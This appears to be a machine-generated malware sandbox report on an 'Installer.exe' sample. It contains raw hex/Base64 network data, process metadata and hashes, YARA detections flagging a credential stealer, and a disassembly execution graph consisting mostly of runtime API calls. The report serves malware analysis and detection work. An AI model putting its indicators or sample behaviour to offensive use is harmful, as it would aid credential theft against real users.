                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 73 48 4f 4a 73 6a 73 71 45 56 52 4a 64 6b 2b 78 69 45 78 64 59 4a 7a 79 2f 66 5a 38 47 79 54 78 2f 4d 35 32 30 63 54 42 6b 78 59 67 4d 51 69 77 62 4f 50 61 45 77 44 38 44 4c 32 5a 6e 39 6d 75 48 58 4e 30 6f 6a 4e 62 4e 36 70 36 54 2f 34 49 78 59 34 55 53 6a 44 30 6d 43 67 36 6f 6b 54 58 69 50 50 4e 63 68 49 62 30 75 4d 54 4d 72 63 6d 38 6c 47 75 74 71 6e 4b 76 74 66 56 30 42 74 63 63 50 32 64 37 69 31 72 68 4e 79 5a 2b 67 75 77 44 74 35 57 4b 4a 5a 79 71 76 63 31 55 4f 37 6c 63 4a 66 37 33 46 4e 51 31 34 74 68 37 4e 64 7a 72 47 6f 53 45 6f 70 37 44 58 72 64 54 67 4a 71 30 37 76 36 64 72 74 66 49 32 4c 71 42 33 6f 63 6d 74 41 61 30 2b 78 38 6c 66 4b 75 50 64 76 5a 7a 54 4b 48 4f 64 46 66 30 65 34 64 4f 6e 76 2f 37 78 42 6a 63 62 47 42 2b 35 52 44 30 56 56
                                                                                                                                                                                                                                                  Data Ascii: sHOJsjsqEVRJdk+xiExdYJzy/fZ8GyTx/M520cTBkxYgMQiwbOPaEwD8DL2Zn9muHXN0ojNbN6p6T/4IxY4USjD0mCg6okTXiPPNchIb0uMTMrcm8lGutqnKvtfV0BtccP2d7i1rhNyZ+guwDt5WKJZyqvc1UO7lcJf73FNQ14th7NdzrGoSEop7DXrdTgJq07v6drtfI2LqB3ocmtAa0+x8lfKuPdvZzTKHOdFf0e4dOnv/7xBjcbGB+5RD0VV
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 2b 66 2b 49 42 71 61 52 6e 54 44 35 64 55 50 51 58 5a 45 64 44 65 79 65 6b 38 6e 37 44 73 4a 4d 6c 44 59 45 39 4d 63 4b 72 7a 65 4b 57 76 6b 30 6b 66 59 64 73 44 30 46 52 6c 42 64 39 77 69 4d 6a 66 38 32 6d 5a 79 4e 77 58 6d 46 31 73 45 43 67 6f 75 39 64 70 76 62 4b 56 56 6d 59 63 30 67 58 6b 4a 54 74 38 75 57 6e 78 2b 76 6a 6e 63 71 79 6d 38 79 62 4e 61 31 4d 36 54 6e 4f 39 73 6c 57 2b 78 5a 4e 51 61 52 44 33 46 39 64 6e 63 57 58 65 56 49 61 6b 31 4c 64 76 72 36 6a 50 47 35 49 77 63 69 42 2b 59 37 37 6f 59 4e 4c 31 67 45 68 48 4a 4b 74 47 34 46 64 4c 65 62 4d 4d 38 4b 33 31 79 6e 6d 43 79 4e 49 35 38 32 5a 4d 4a 58 64 59 6c 63 64 56 6d 73 36 58 54 55 38 56 2f 6b 58 75 61 45 39 5a 69 6e 4c 50 72 49 4f 39 4f 70 71 69 32 53 6a 76 53 55 67 6c 61 45 36 6e 31
                                                                                                                                                                                                                                                  Data Ascii: +f+IBqaRnTD5dUPQXZEdDeyek8n7DsJMlDYE9McKrzeKWvk0kfYdsD0FRlBd9wiMjf82mZyNwXmF1sECgou9dpvbKVVmYc0gXkJTt8uWnx+vjncqym8ybNa1M6TnO9slW+xZNQaRD3F9dncWXeVIak1Ldvr6jPG5IwciB+Y77oYNL1gEhHJKtG4FdLebMM8K31ynmCyNI582ZMJXdYlcdVms6XTU8V/kXuaE9ZinLPrIO9Opqi2SjvSUglaE6n1
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 6e 45 47 4d 4c 39 51 2f 50 51 57 68 34 33 57 54 4a 35 4d 48 53 62 70 47 47 38 44 50 76 58 6e 35 42 56 6d 4f 47 77 56 53 56 38 4f 39 46 5a 41 72 75 45 63 49 37 55 45 75 65 54 76 62 4a 79 66 35 6e 32 36 62 53 52 76 64 76 56 44 30 75 53 72 2f 45 65 34 76 69 39 58 4a 43 4d 73 34 44 34 6c 31 76 61 4b 74 53 78 36 76 59 34 30 62 63 6e 36 77 41 36 6d 5a 67 49 43 35 34 6e 62 52 7a 73 66 65 7a 64 57 49 34 36 54 4c 6f 63 6c 39 6a 70 46 4c 31 72 75 65 30 61 70 36 57 72 52 6e 75 61 33 34 45 54 57 76 4a 7a 43 4f 39 37 71 64 30 62 6a 69 72 51 38 64 53 62 47 57 4c 66 35 44 54 34 72 59 35 74 64 37 2f 47 38 31 2b 45 56 78 56 63 35 7a 50 51 4d 44 77 69 6e 59 54 46 2f 63 34 38 48 52 39 59 6f 5a 75 2f 66 6d 62 79 58 43 73 70 2b 67 49 77 6d 4a 52 46 6d 39 71 6f 38 56 4a 74 38
                                                                                                                                                                                                                                                  Data Ascii: nEGML9Q/PQWh43WTJ5MHSbpGG8DPvXn5BVmOGwVSV8O9FZAruEcI7UEueTvbJyf5n26bSRvdvVD0uSr/Ee4vi9XJCMs4D4l1vaKtSx6vY40bcn6wA6mZgIC54nbRzsfezdWI46TLocl9jpFL1rue0ap6WrRnua34ETWvJzCO97qd0bjirQ8dSbGWLf5DT4rY5td7/G81+EVxVc5zPQMDwinYTF/c48HR9YoZu/fmbyXCsp+gIwmJRFm9qo8VJt8
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 46 63 74 46 38 45 49 78 63 4a 31 42 31 64 54 69 77 6d 32 48 77 65 73 5a 34 48 46 31 49 31 64 56 77 50 55 67 6d 2b 6d 53 66 68 30 66 34 41 44 67 64 54 73 46 72 6d 6e 6f 31 63 54 46 4f 4c 4f 58 36 78 7a 57 52 47 6b 56 61 33 79 57 31 6d 53 2f 39 61 56 52 57 41 44 64 4c 75 31 52 5a 57 4f 64 64 4f 6a 4c 77 73 73 77 6f 38 62 38 46 2b 42 42 61 6c 77 71 58 5a 47 7a 4f 73 2f 59 68 58 78 71 4a 4e 59 5a 35 30 63 2f 41 4c 6c 61 38 76 4c 46 34 30 75 4b 73 39 59 43 31 6c 68 4f 45 55 35 64 6f 4f 64 62 6a 50 57 46 61 45 59 66 77 7a 48 48 52 57 78 43 75 30 72 63 35 38 57 79 5a 4a 32 2b 38 6a 62 44 55 68 4d 65 58 46 36 33 74 6b 4b 44 77 71 30 50 53 54 2f 58 4a 4f 45 6a 53 32 48 65 57 39 44 73 38 75 64 47 75 70 6a 4d 49 50 5a 37 45 6a 42 35 4b 73 66 59 51 35 65 7a 2f 52 5a
                                                                                                                                                                                                                                                  Data Ascii: FctF8EIxcJ1B1dTiwm2HwesZ4HF1I1dVwPUgm+mSfh0f4ADgdTsFrmno1cTFOLOX6xzWRGkVa3yW1mS/9aVRWADdLu1RZWOddOjLwsswo8b8F+BBalwqXZGzOs/YhXxqJNYZ50c/ALla8vLF40uKs9YC1lhOEU5doOdbjPWFaEYfwzHHRWxCu0rc58WyZJ2+8jbDUhMeXF63tkKDwq0PST/XJOEjS2HeW9Ds8udGupjMIPZ7EjB5KsfYQ5ez/RZ
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 5a 45 37 54 48 61 49 5a 34 62 2b 31 38 4a 68 77 70 62 59 4a 64 56 4a 55 42 35 58 59 34 57 30 66 61 76 7a 76 45 31 4a 65 4f 77 63 38 6c 31 66 64 4b 46 70 33 64 65 4a 36 6b 79 4c 78 64 49 52 34 45 64 79 4e 58 64 56 68 4f 68 36 79 4e 50 30 5a 78 6b 61 34 44 6d 55 59 56 39 34 6a 47 2f 53 72 66 50 52 52 4b 57 66 33 54 54 30 66 6c 49 45 64 32 47 62 79 46 79 79 35 59 68 4b 48 68 62 63 51 4d 5a 53 5a 33 61 31 59 4d 66 32 31 66 56 71 75 35 58 36 46 65 70 38 64 78 68 30 54 37 6e 6c 55 38 33 59 69 33 52 5a 4d 76 63 66 36 55 41 39 51 64 74 77 38 71 37 46 73 45 71 5a 6c 64 41 6c 31 55 6c 51 48 6c 64 6a 68 62 52 39 71 73 71 78 56 6d 52 6d 37 52 65 51 56 57 39 32 6d 57 72 36 32 50 33 63 65 62 2f 41 7a 52 37 4a 62 42 4d 32 66 30 32 32 34 58 57 71 36 59 35 76 48 52 75 71
                                                                                                                                                                                                                                                  Data Ascii: ZE7THaIZ4b+18JhwpbYJdVJUB5XY4W0favzvE1JeOwc8l1fdKFp3deJ6kyLxdIR4EdyNXdVhOh6yNP0Zxka4DmUYV94jG/SrfPRRKWf3TT0flIEd2GbyFyy5YhKHhbcQMZSZ3a1YMf21fVqu5X6Fep8dxh0T7nlU83Yi3RZMvcf6UA9Qdtw8q7FsEqZldAl1UlQHldjhbR9qsqxVmRm7ReQVW92mWr62P3ceb/AzR7JbBM2f0224XWq6Y5vHRuq
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 30 49 71 30 54 58 39 65 50 52 52 72 72 61 77 6c 2f 30 55 58 4d 69 57 56 79 59 79 47 4f 42 39 2f 46 4f 48 41 4c 73 48 2f 5a 37 65 6c 79 47 51 4d 58 6f 36 72 64 76 72 4c 4c 59 49 2b 73 2f 54 6a 78 56 4b 6f 66 58 56 4a 76 4c 68 6b 78 78 48 2f 45 43 36 33 55 34 43 61 55 56 36 65 6a 54 77 48 79 36 70 63 74 43 36 48 4a 72 51 48 68 7a 78 4f 38 70 67 37 65 59 43 78 6f 6a 6f 68 72 53 61 48 70 57 6f 6c 4c 61 35 4d 72 2b 53 6f 61 43 31 44 4c 52 5a 32 59 75 62 48 61 79 31 46 32 6f 7a 4a 31 4f 5a 6d 54 76 42 76 5a 53 58 32 61 4e 56 50 76 75 32 4d 46 35 69 72 4c 72 48 64 68 52 53 43 46 57 59 34 54 65 50 72 58 56 74 6c 4e 6a 50 61 67 76 6d 32 4a 52 5a 4c 55 58 32 66 71 44 37 54 32 4e 73 76 6f 69 78 56 51 4c 4f 55 73 79 73 38 4e 54 6e 38 69 48 62 42 31 6c 6f 30 4c 58 58
                                                                                                                                                                                                                                                  Data Ascii: 0Iq0TX9ePRRrrawl/0UXMiWVyYyGOB9/FOHALsH/Z7elyGQMXo6rdvrLLYI+s/TjxVKofXVJvLhkxxH/EC63U4CaUV6ejTwHy6pctC6HJrQHhzxO8pg7eYCxojohrSaHpWolLa5Mr+SoaC1DLRZ2YubHay1F2ozJ1OZmTvBvZSX2aNVPvu2MF5irLrHdhRSCFWY4TePrXVtlNjPagvm2JRZLUX2fqD7T2NsvoixVQLOUsys8NTn8iHbB1lo0LXX
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 52 6a 64 62 4b 34 6c 69 43 71 50 63 35 6c 6e 31 55 49 6b 42 79 70 2f 42 72 6d 4f 75 78 61 56 34 64 6f 69 57 57 4a 56 4e 77 75 46 66 37 36 74 6d 7a 66 4c 71 67 71 79 57 57 62 58 45 46 65 47 71 73 72 55 4f 51 79 34 78 52 47 44 2f 4c 54 2f 46 78 65 33 2b 65 63 49 71 76 68 4c 5a 77 70 63 4b 76 47 2b 56 70 46 43 73 31 57 71 72 6e 49 62 7a 45 72 48 78 66 4a 63 6b 46 7a 47 6f 38 51 4b 5a 54 38 4b 76 36 30 6b 2b 72 74 2b 73 39 6b 7a 39 6f 48 57 78 7a 6c 4e 64 6b 6e 64 65 53 46 56 6b 46 36 54 7a 50 4a 31 74 77 6f 47 62 77 72 2f 2b 33 52 4a 32 79 7a 52 4c 6d 4f 47 30 64 53 30 33 49 78 43 50 42 32 76 31 4e 65 57 58 39 41 2b 56 33 54 55 47 37 45 63 6e 6c 69 63 78 48 73 59 66 54 52 65 56 2b 46 30 4a 33 56 4b 4c 53 66 70 6a 51 69 42 5a 63 48 65 38 5a 77 46 31 6b 53 49
                                                                                                                                                                                                                                                  Data Ascii: RjdbK4liCqPc5ln1UIkByp/BrmOuxaV4doiWWJVNwuFf76tmzfLqgqyWWbXEFeGqsrUOQy4xRGD/LT/Fxe3+ecIqvhLZwpcKvG+VpFCs1WqrnIbzErHxfJckFzGo8QKZT8Kv60k+rt+s9kz9oHWxzlNdkndeSFVkF6TzPJ1twoGbwr/+3RJ2yzRLmOG0dS03IxCPB2v1NeWX9A+V3TUG7EcnlicxHsYfTReV+F0J3VKLSfpjQiBZcHe8ZwF1kSI


                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:17:13:20
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Installer.exe"
                                                                                                                                                                                                                                                  Imagebase:0x340000
                                                                                                                                                                                                                                                  File size:577'064 bytes
                                                                                                                                                                                                                                                  MD5 hash:0CEBF27D0066D6EA5653547254E236E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:17:13:20
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:17:13:21
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Installer.exe"
                                                                                                                                                                                                                                                  Imagebase:0x340000
                                                                                                                                                                                                                                                  File size:577'064 bytes
                                                                                                                                                                                                                                                  MD5 hash:0CEBF27D0066D6EA5653547254E236E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:17:13:21
                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Installer.exe"
                                                                                                                                                                                                                                                  Imagebase:0x340000
                                                                                                                                                                                                                                                  File size:577'064 bytes
                                                                                                                                                                                                                                                  MD5 hash:0CEBF27D0066D6EA5653547254E236E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835591588.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835776038.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1874516417.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:6.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                                    Signature Coverage:5.6%
                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                    Total number of Limit Nodes:16
                                                                                                                                                                                                                                                    execution_graph 19744 3592d7 19747 35bed7 19744->19747 19748 35bee2 RtlFreeHeap 19747->19748 19752 3592ef 19747->19752 19749 35bef7 GetLastError 19748->19749 19748->19752 19750 35bf04 __dosmaperr 19749->19750 19753 3576e4 19750->19753 19756 35c2bb GetLastError 19753->19756 19755 3576e9 19755->19752 19757 35c2d1 19756->19757 19758 35c2d7 19756->19758 19779 35cb94 19757->19779 19777 35c2db SetLastError 19758->19777 19784 35cbd3 19758->19784 19765 35c321 19768 35cbd3 __Getctype 6 API calls 19765->19768 19766 35c310 19767 35cbd3 __Getctype 6 API calls 19766->19767 19776 35c31e 19767->19776 19769 35c32d 19768->19769 19770 35c331 19769->19770 19771 35c348 19769->19771 19774 35cbd3 __Getctype 6 API calls 19770->19774 19798 35c47c 19771->19798 19772 35bed7 ___free_lconv_mon 12 API calls 19772->19777 19774->19776 19776->19772 19777->19755 19778 35bed7 ___free_lconv_mon 12 API calls 19778->19777 19803 35cfd6 19779->19803 19782 35cbb9 19782->19758 19783 35cbcb TlsGetValue 19785 35cfd6 __Getctype 5 API calls 19784->19785 19786 35cbef 19785->19786 19787 35cc0d TlsSetValue 19786->19787 19788 35c2f3 19786->19788 19788->19777 19789 35d2b4 19788->19789 19790 35d2c1 19789->19790 19791 35d301 19790->19791 19792 35d2d5 __Getctype 19790->19792 19793 35d2ec HeapAlloc 19790->19793 19795 3576e4 __Wcrtomb 13 API calls 19791->19795 19792->19791 19792->19793 19818 355877 19792->19818 19793->19792 19794 35d2ff 19793->19794 19796 35c308 19794->19796 19795->19796 19796->19765 19796->19766 19832 35c5e2 19798->19832 19804 35d006 19803->19804 19808 35cbb0 19803->19808 19804->19808 19810 35cf0b 19804->19810 19807 35d020 GetProcAddress 19807->19808 19809 35d030 __Getctype 19807->19809 19808->19782 19808->19783 19809->19808 19816 35cf1c ___vcrt_FlsGetValue 19810->19816 19811 35cfb2 19811->19807 19811->19808 19812 35cf3a LoadLibraryExW 19813 35cf55 GetLastError 19812->19813 19814 35cfb9 19812->19814 19813->19816 19814->19811 19815 35cfcb FreeLibrary 19814->19815 19815->19811 19816->19811 19816->19812 19817 35cf88 LoadLibraryExW 19816->19817 19817->19814 19817->19816 19821 3558b2 19818->19821 19822 3558be ___scrt_is_nonwritable_in_current_image 19821->19822 19827 3580e1 EnterCriticalSection 19822->19827 19824 3558c9 CallUnexpected 19828 355900 19824->19828 19827->19824 19831 3580f8 LeaveCriticalSection 19828->19831 19830 355882 19830->19792 19831->19830 19833 35c5ee ___scrt_is_nonwritable_in_current_image 19832->19833 19846 3580e1 EnterCriticalSection 19833->19846 19835 35c5f8 19847 35c628 19835->19847 19838 35c634 19839 35c640 ___scrt_is_nonwritable_in_current_image 19838->19839 19851 3580e1 EnterCriticalSection 19839->19851 19841 35c64a 19852 35c431 19841->19852 19843 35c662 19856 35c682 19843->19856 19846->19835 19850 3580f8 LeaveCriticalSection 19847->19850 19849 35c4ea 19849->19838 19850->19849 19851->19841 19853 35c440 __Getctype 19852->19853 19855 35c467 __Getctype 19852->19855 19853->19855 19859 3606da 19853->19859 19855->19843 19973 3580f8 LeaveCriticalSection 19856->19973 19858 35c353 19858->19778 19860 36075a 19859->19860 19862 3606f0 19859->19862 19863 35bed7 ___free_lconv_mon 14 API calls 19860->19863 19886 3607a8 19860->19886 19862->19860 19864 360723 19862->19864 19868 35bed7 ___free_lconv_mon 14 API calls 19862->19868 19865 36077c 19863->19865 19874 35bed7 ___free_lconv_mon 14 API calls 19864->19874 19885 360745 19864->19885 19866 35bed7 ___free_lconv_mon 14 API calls 19865->19866 19869 36078f 19866->19869 19867 35bed7 ___free_lconv_mon 14 API calls 19870 36074f 19867->19870 19873 360718 19868->19873 19875 35bed7 ___free_lconv_mon 14 API calls 19869->19875 19876 35bed7 ___free_lconv_mon 14 API calls 19870->19876 19871 360816 19877 35bed7 ___free_lconv_mon 14 API calls 19871->19877 19872 3607b6 19872->19871 19884 35bed7 14 API calls ___free_lconv_mon 19872->19884 19887 35fb31 19873->19887 19879 36073a 19874->19879 19880 36079d 19875->19880 19876->19860 19881 36081c 19877->19881 19915 35fe4d 19879->19915 19883 35bed7 ___free_lconv_mon 14 API calls 19880->19883 19881->19855 19883->19886 19884->19872 19885->19867 19927 360874 19886->19927 19888 35fb42 19887->19888 19914 35fc2b 19887->19914 19889 35fb53 19888->19889 19891 35bed7 ___free_lconv_mon 14 API calls 19888->19891 19890 35fb65 19889->19890 19892 35bed7 ___free_lconv_mon 14 API calls 19889->19892 19893 35fb77 19890->19893 19894 35bed7 ___free_lconv_mon 14 API calls 19890->19894 19891->19889 19892->19890 19895 35bed7 ___free_lconv_mon 14 API calls 19893->19895 19898 35fb89 19893->19898 19894->19893 19895->19898 19896 35fb9b 19897 35fbad 19896->19897 19900 35bed7 ___free_lconv_mon 14 API calls 19896->19900 19901 35fbbf 19897->19901 19902 35bed7 ___free_lconv_mon 14 API calls 19897->19902 19898->19896 19899 35bed7 ___free_lconv_mon 14 API calls 19898->19899 19899->19896 19900->19897 19903 35fbd1 19901->19903 19904 35bed7 ___free_lconv_mon 14 API calls 19901->19904 19902->19901 19905 35fbe3 19903->19905 19907 35bed7 ___free_lconv_mon 14 API calls 19903->19907 19904->19903 19906 35fbf5 19905->19906 19908 35bed7 ___free_lconv_mon 14 API calls 19905->19908 19909 35fc07 19906->19909 19910 35bed7 ___free_lconv_mon 14 API calls 19906->19910 19907->19905 19908->19906 19911 35fc19 19909->19911 19912 35bed7 ___free_lconv_mon 14 API calls 19909->19912 19910->19909 19913 35bed7 ___free_lconv_mon 14 API calls 19911->19913 19911->19914 19912->19911 19913->19914 19914->19864 19916 35fe5a 19915->19916 19926 35feb2 19915->19926 19917 35fe6a 19916->19917 19918 35bed7 ___free_lconv_mon 14 API calls 19916->19918 19919 35fe7c 19917->19919 19920 35bed7 ___free_lconv_mon 14 API calls 19917->19920 19918->19917 19921 35fe8e 19919->19921 19922 35bed7 ___free_lconv_mon 14 API calls 19919->19922 19920->19919 19923 35fea0 19921->19923 19924 35bed7 ___free_lconv_mon 14 API calls 19921->19924 19922->19921 19925 35bed7 ___free_lconv_mon 14 API calls 19923->19925 19923->19926 19924->19923 19925->19926 19926->19885 19928 3608a0 19927->19928 19929 360881 19927->19929 19928->19872 19929->19928 19933 35ff3b 19929->19933 19932 35bed7 ___free_lconv_mon 14 API calls 19932->19928 19934 35ff4c 19933->19934 19935 360019 19933->19935 19969 36029b 19934->19969 19935->19932 19938 36029b __Getctype 14 API calls 19939 35ff5f 19938->19939 19940 36029b __Getctype 14 API calls 19939->19940 19941 35ff6a 19940->19941 19942 36029b __Getctype 14 API calls 19941->19942 19943 35ff75 19942->19943 19944 36029b __Getctype 14 API calls 19943->19944 19945 35ff83 19944->19945 19946 35bed7 ___free_lconv_mon 14 API calls 19945->19946 19947 35ff8e 19946->19947 19948 35bed7 ___free_lconv_mon 14 API calls 19947->19948 19949 35ff99 19948->19949 19970 3602ad 19969->19970 19971 35ff54 19970->19971 19972 35bed7 ___free_lconv_mon 14 API calls 19970->19972 19971->19938 19972->19970 19973->19858 19974 34b060 19997 34afc4 GetModuleHandleExW 19974->19997 19977 34b0a6 19979 34afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 19977->19979 19981 34b0ac 19979->19981 19983 34b0cd 19981->19983 20014 34afa7 GetModuleHandleExW 19981->20014 19999 347770 19983->19999 19985 34b0bd 19985->19983 19986 34b0c3 FreeLibraryWhenCallbackReturns 19985->19986 19986->19983 19987 34b0dd 19988 34afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 19987->19988 19989 34b0e3 19988->19989 19990 34aefa 37 API calls 19989->19990 19995 34b111 19989->19995 19991 34b0ef 19990->19991 19992 34efd2 ReleaseSRWLockExclusive 19991->19992 19993 34b102 19992->19993 19993->19995 20015 34e95d WakeAllConditionVariable 19993->20015 19998 34afda 19997->19998 19998->19977 20005 34aefa 19998->20005 20000 3477af 19999->20000 20016 348aa0 20000->20016 20001 3477b9 20021 34af64 20001->20021 20003 3477cb 20003->19987 20006 34efc1 12 API calls 20005->20006 20008 34af03 20006->20008 20007 34b317 std::_Throw_Cpp_error 30 API calls 20009 34af20 20007->20009 20008->20007 20010 34af17 20008->20010 20011 34efd2 20010->20011 20012 34efed 20011->20012 20013 34efdf ReleaseSRWLockExclusive 20011->20013 20012->19977 20013->20012 20014->19985 20015->19995 20017 348add 20016->20017 20018 348ae8 20017->20018 20024 3490f0 20017->20024 20040 3490e0 20017->20040 20018->20001 20022 34af70 CloseThreadpoolWork 20021->20022 20023 34af7b 20021->20023 20022->20023 20023->20003 20057 34efc1 20024->20057 20027 349136 20029 349143 20027->20029 20030 3491ce 20027->20030 20028 3491c7 20067 34b317 20028->20067 20032 349174 20029->20032 20033 34914b 20029->20033 20034 34b317 std::_Throw_Cpp_error 30 API calls 20030->20034 20035 34efd2 ReleaseSRWLockExclusive 20032->20035 20036 34efd2 ReleaseSRWLockExclusive 20033->20036 20037 349151 std::_Throw_Cpp_error 20034->20037 20038 349181 20035->20038 20036->20037 20037->20018 20060 3492f0 20038->20060 20041 3490ea 20040->20041 20042 34efc1 12 API calls 20041->20042 20043 34912b 20042->20043 20044 349136 20043->20044 20045 3491c7 20043->20045 20046 349143 20044->20046 20047 3491ce 20044->20047 20048 34b317 std::_Throw_Cpp_error 30 API calls 20045->20048 20049 349174 20046->20049 20050 34914b 20046->20050 20051 34b317 std::_Throw_Cpp_error 30 API calls 20047->20051 20048->20047 20052 34efd2 ReleaseSRWLockExclusive 20049->20052 20053 34efd2 ReleaseSRWLockExclusive 20050->20053 20056 349151 std::_Throw_Cpp_error 20051->20056 20054 349181 20052->20054 20053->20056 20055 3492f0 66 API calls 20054->20055 20055->20056 20056->20018 20073 34eff1 GetCurrentThreadId 20057->20073 20107 349620 20060->20107 20064 34939f 20116 349400 20064->20116 20068 34b32d std::_Throw_Cpp_error 20067->20068 20240 34b352 20068->20240 20074 34f03a 20073->20074 20075 34f01b 20073->20075 20077 34f043 20074->20077 20078 34f05a 20074->20078 20076 34f020 AcquireSRWLockExclusive 20075->20076 20084 34f030 20075->20084 20076->20084 20079 34f04e AcquireSRWLockExclusive 20077->20079 20077->20084 20080 34f0b9 20078->20080 20087 34f072 20078->20087 20079->20084 20082 34f0c0 TryAcquireSRWLockExclusive 20080->20082 20080->20084 20082->20084 20083 34912b 20083->20027 20083->20028 20088 34a6e1 20084->20088 20086 34f0a9 TryAcquireSRWLockExclusive 20086->20084 20086->20087 20087->20084 20087->20086 20095 34fdcd 20087->20095 20089 34a6e9 20088->20089 20090 34a6ea IsProcessorFeaturePresent 20088->20090 20089->20083 20092 34f447 20090->20092 20098 34f52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20092->20098 20094 34f52a 20094->20083 20099 34fda6 20095->20099 20097 34fdd8 __aulldiv __aullrem 20097->20087 20098->20094 20102 3500b4 20099->20102 20103 3500e4 GetSystemTimePreciseAsFileTime 20102->20103 20104 3500f0 GetSystemTimeAsFileTime 20102->20104 20105 34fdb4 20103->20105 20104->20105 20105->20097 20108 349667 20107->20108 20141 34a663 20108->20141 20111 3494f0 20112 349536 std::_Throw_Cpp_error 20111->20112 20115 349540 std::_Throw_Cpp_error 20112->20115 20155 34b57d 20112->20155 20115->20064 20117 34efc1 12 API calls 20116->20117 20118 349418 20117->20118 20119 3494c6 20118->20119 20121 3494cd 20118->20121 20123 349443 20118->20123 20124 349438 20118->20124 20120 34b317 std::_Throw_Cpp_error 30 